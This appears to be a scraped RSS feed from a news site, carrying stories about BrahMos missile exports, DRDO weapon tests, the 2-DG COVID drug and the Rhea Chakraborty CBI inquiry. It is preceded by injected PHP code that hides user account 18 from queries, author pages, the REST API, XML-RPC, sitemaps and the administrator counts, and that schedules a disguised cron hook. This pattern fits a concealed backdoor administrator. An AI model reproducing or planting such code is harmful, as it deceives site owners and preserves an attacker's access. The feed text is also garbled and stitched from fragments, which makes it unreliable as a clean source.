add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post India Nears Major BrahMos Export Deals Worth 450 Million Dollars appeared first on The Edge Media.
]]>
The BrahMos system, jointly created by India’s Defence Research and Development Organisation and Russia, has drawn strong interest from partner nations after its precise strikes on several Pakistani air bases during Operation Sindoor, which rendered many facilities non-operational for several days.
According to defence sources, the agreements are in the final stages and are expected to be signed soon, with additional demand anticipated as more countries express interest in the missile.
The missile’s recent presence at the Dubai Air Show attracted significant attention from potential buyers. Following its effective deployment against Pakistan, the Indian defence ministry approved a substantial procurement plan for the Navy, along with air and ground-launched versions for the Indian Air Force. During the four-day confrontation, BrahMos missiles targeted Pakistani air bases and military cantonments across the country.
The Indian Navy intends to integrate the missile into its Veer-class warships, while the Indian Air Force plans to equip its Su-30 MKI fleet with air-launched variants.
Several months earlier, the Indian Prime Minister commended the performance of indigenous weapon systems during the conflict, stating that Operation Sindoor demonstrated the capability of India’s homegrown defence technology, particularly the BrahMos system.
In the initial phase of the confrontation, India targeted terrorist infrastructure in Pakistan, including facilities linked to Jaish-e-Mohammed and Lashkar-e-Taiba in Punjab province.
The BrahMos missile served as the primary strike weapon for the Indian Air Force, delivering high-precision hits.
The damage caused to Pakistani air bases prompted attempts by the Pakistan Army to retaliate in support of the terrorist groups and their assets.
The post India Nears Major BrahMos Export Deals Worth 450 Million Dollars appeared first on The Edge Media.
]]>The post India has Passed the Test: Indigenous Technology Cruise Missile produced by the DRDO appeared first on The Edge Media.
]]>According to sources, the missile flew for 150 kilometers using an indigenous cruise engine. More tests will be carried out in the near future.
On July 23, an indigenously produced New Generation Akash Missile (Akash-NG), a Surface to Air Missile defense system, was successfully test-fired at Balasore. The 30km strike-range air defense missile systems were tested for the second time in two days.
The post India has Passed the Test: Indigenous Technology Cruise Missile produced by the DRDO appeared first on The Edge Media.
]]>The post India’s DRDO has successfully Test-Fired the Anti-Tank Missile. appeared first on The Edge Media.
]]>The low weight, fire and forget , anti-tank guided missile was launched from a man-portable launcher integrated with a thermal sight, news agency ANI quoted the DRDO as saying.
The missile hit the target, a dummy tank, in direct attack mode and destroyed it with precision, the DRDO said. “The test has validated the minimum range successfully,” it said.
The post India’s DRDO has successfully Test-Fired the Anti-Tank Missile. appeared first on The Edge Media.
]]>The post DRDO’S Anti-COVID Drug Launched appeared first on The Edge Media.
]]>This comes in after DGCI approved the oral drug for emergency use. Earlier on May 8, the defense ministry said that the clinical trials of the drug 2-DG, 2-deoxy-D-Glucose showed that it helps in faster recovery of hospitalized patients and reduces supplemental oxygen dependability.
The drug comes has been developed by INMAS with Dr. Reddy’s Laboratories in Hyderabad. It comes in powder form in a sachet and can be consumed orally with water.

Health Minister, Harsha Vardhan said that under the leadership of Rajnath Singh and with the help of DRDO this might be the first indigenous research-based outcome to fight against Covid-19. He also said that under Prime Minister, Narendra Modi DRDO has played a vital role in the fight against Covid-19. He added, hopefully, it serves in the fight against Covid-19 not just for India but globally. Moreover, he thanked and congratulated, DRDO and its scientists.
The post DRDO’S Anti-COVID Drug Launched appeared first on The Edge Media.
]]>The post DRDO’s Anti-Covid oral drug to be given out tomorrow appeared first on The Edge Media.
]]>The drug is called 2-deoxy-D-glucose or 2-DG and was developed by a DRDO lab in collaboration with Hyderabad-based pharma company, Dr. Reddy’s Laboratories. The country’s top drug regulator, Drugs Controller General of India (DCGI), has approved the medicine for emergency use.
The drug has shown excellent results in its phase 2 and phase 3 clinical trials. The medicine was developed to be safe for COVID-19 patients in phase 2 trials which was conducted between May and October. It was also found that it is successful in cutting short the hospital stays of patients and reducing supplemental use of oxygen.
The post DRDO’s Anti-Covid oral drug to be given out tomorrow appeared first on The Edge Media.
]]>The post Covid-19 hospitals, oxygen generation, 2-DG drug: How DRDO has pitched in to tackle second wave appeared first on The Edge Media.
]]>The organisation has made makeshift hospitals with negative pressure tents to help those need specialised medical care due to Covid-19. The specifications of the hospital infrastructure on the ICU beds, oxygen beds and normal beds was worked out in consultation with the state health authorities.The equipment for Covid-19 care is provided as per specified standards, the DRDO said. The maintenance and upkeep of the equipment is round-the-clock at a time when the spread of Covid-19 has led to lockdown-like conditions in several states, it added.
Nine hospitals for Covid-19 have been set up by the DRDO in cities like Delhi, Ahmedabad, Lucknow, Varanasi, Gandhi Nagar, Haldwani, Rishikesh, Jammu and Srinagar. The biggest among them is the Dhanvantri Covid Care Hospital in Gandhi Nagar which has 700 oxygen beds and 200 ICU beds. In Delhi, Sardar Patel Covid Care Centre has 500 ICU beds.
The post Covid-19 hospitals, oxygen generation, 2-DG drug: How DRDO has pitched in to tackle second wave appeared first on The Edge Media.
]]>The post CBI Questions Rhea Chakraborty & Her Brother Again appeared first on The Edge Media.
]]>The 28-year-old actress is accused of abetting Rajput’s suicide. Her brother Showik Chakraborty was also called by the CBI for the fourth day in a row for questioning in the case, the official said.
Rhea Chakraborty and her brother reached the DRDO guest house at Kalina in Santacruz, where the probe team is stationed, around 10.30 am, he said. A Mumbai Police vehicle escorted the car in which the two arrived at the guest house, he said. Rajput’s manager Samual Miranda and domestic help Keshav also reached the guest house in the morning.
Earlier, Rhea Chakraborty was questioned for nearly 10 hours on Friday and allowed to return home under police escort as a large number of media personnel were present outside her building. She was quizzed for around seven hours on Saturday. Her brother is being questioned by the CBI since Thursday.
On Saturday, the CBI also questioned Rajput’s flatmate Siddharth Pithani, cook Neeraj Singh and accountant Rajat Mewati at the guest house. Rajput (34) was found hanging in his flat in suburban Bandra on June 14.
Rhea Chakraborty had been earlier questioned by the Mumbai Police in the case. The Enforcement Directorate has also quizzed her in a related money laundering case.
The Supreme Court last week upheld the transfer of an FIR, lodged by Rajput’s father in Patna against the actress and others for allegedly abetting his son’s suicide and misappropriating his money, to the CBI.
– PTI
The post CBI Questions Rhea Chakraborty & Her Brother Again appeared first on The Edge Media.
]]>